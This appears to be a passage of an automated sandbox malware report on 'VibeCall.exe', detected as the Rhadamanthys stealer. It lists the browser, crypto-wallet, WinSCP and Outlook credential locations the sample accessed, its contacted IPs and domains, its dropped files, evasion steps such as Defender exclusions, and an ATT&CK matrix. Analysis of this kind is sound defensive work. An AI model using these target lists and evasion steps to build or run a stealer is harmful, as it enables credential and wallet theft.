                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000022.00000002.2777497485.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2579586240.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2681694374.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.2688506729.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2722243959.0000021CF0C64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.2520595977.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2671345515.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2590456419.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2614610327.0000000003470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2582991555.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2535462234.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2721986906.0000021CF0BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2628343586.000000000483D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2694853009.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.2526569864.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                      Source: Yara matchFile source: 00000021.00000003.2772159499.0000021CF055C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2774763496.0000021CF055C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2768390678.0000021CF055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2760654199.0000021CF055A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2770959858.0000021CF055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2760459706.0000021CF0558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2761711163.0000021CF0553000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000022.00000002.2777497485.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2579586240.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2681694374.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.2688506729.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2722243959.0000021CF0C64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.2520595977.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.2671345515.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2590456419.0000000003AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2614610327.0000000003470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2582991555.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2535462234.0000000003080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.2721986906.0000021CF0BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.2628343586.000000000483D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2694853009.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.2526569864.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts141
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		Boot or Logon Initialization Scripts11
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		1
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		155
                      System Information Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing                      		NTDS261
                      Security Software Discovery                      		Distributed Component Object Model21
                      Input Capture                      		11
                      Non-Standard Port                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials171
                      Virtualization/Sandbox Evasion                      		VNCGUI Input Capture124
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items171
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1626653 Sample: VibeCall.exe Startdate: 28/02/2025 Architecture: WINDOWS Score: 99 64 pastebin.com 2->64 66 rustaisolutionnorisk.com 2->66 68 2 other IPs or domains 2->68 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Yara detected RHADAMANTHYS Stealer 2->90 94 6 other signatures 2->94 10 VibeCall.exe 17 2->10         started        signatures3 92 Connects to a pastebin service (likely for C&C) 64->92 process4 dnsIp5 80 ip-api.com 208.95.112.1 TUT-ASUS United States 10->80 82 147.45.60.20 FREE-NET-ASFREEnetEU Russian Federation 10->82 84 2 other IPs or domains 10->84 56 C:\Users\...\soundsolution_vibecall_c.exe, PE32 10->56 dropped 58 C:\Users\user\...\aisolution_vibecall_a.exe, PE32 10->58 dropped 60 C:\Users\...\videosolution_vibecall_b.exe, PE32 10->60 dropped 62 C:\Users\...\contry_solution_vibecall_e.exe, PE32 10->62 dropped 98 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->98 100 Drops PE files to the document folder of the user 10->100 102 Bypasses PowerShell execution policy 10->102 104 Adds a directory exclusion to Windows Defender 10->104 15 soundsolution_vibecall_c.exe 1 10->15         started        18 contry_solution_vibecall_e.exe 1 10->18         started        20 videosolution_vibecall_b.exe 10->20         started        22 4 other processes 10->22 file6 signatures7 process8 dnsIp9 114 Switches to a custom stack to bypass stack traces 15->114 25 OpenWith.exe 15->25         started        37 2 other processes 15->37 29 fontdrvhost.exe 18->29         started        39 2 other processes 18->39 31 fontdrvhost.exe 20->31         started        41 2 other processes 20->41 70 pastebin.com 104.20.3.235, 443, 49739 CLOUDFLARENETUS United States 22->70 116 Loading BitLocker PowerShell Module 22->116 33 WerFault.exe 21 16 22->33         started        35 conhost.exe 22->35         started        43 2 other processes 22->43 signatures10 process11 dnsIp12 72 98.142.253.232 VELCOMCA Canada 25->72 96 Switches to a custom stack to bypass stack traces 25->96 45 OpenWith.exe 25->45         started        74 api.help-asus.com 79.141.162.188 HZ-US-ASBG Bulgaria 29->74 76 104.16.249.249 CLOUDFLARENETUS United States 29->76 48 fontdrvhost.exe 29->48         started        78 45.129.185.24 VDI-NETWORKUS Russian Federation 31->78 50 fontdrvhost.exe 31->50         started        signatures13 process14 signatures15 106 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->106 108 Tries to steal Mail credentials (via file / registry access) 45->108 110 Tries to harvest and steal browser information (history, passwords, etc) 45->110 112 Tries to harvest and steal Bitcoin Wallet information 45->112 52 WerFault.exe 48->52         started        54 WerFault.exe 50->54         started        process16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.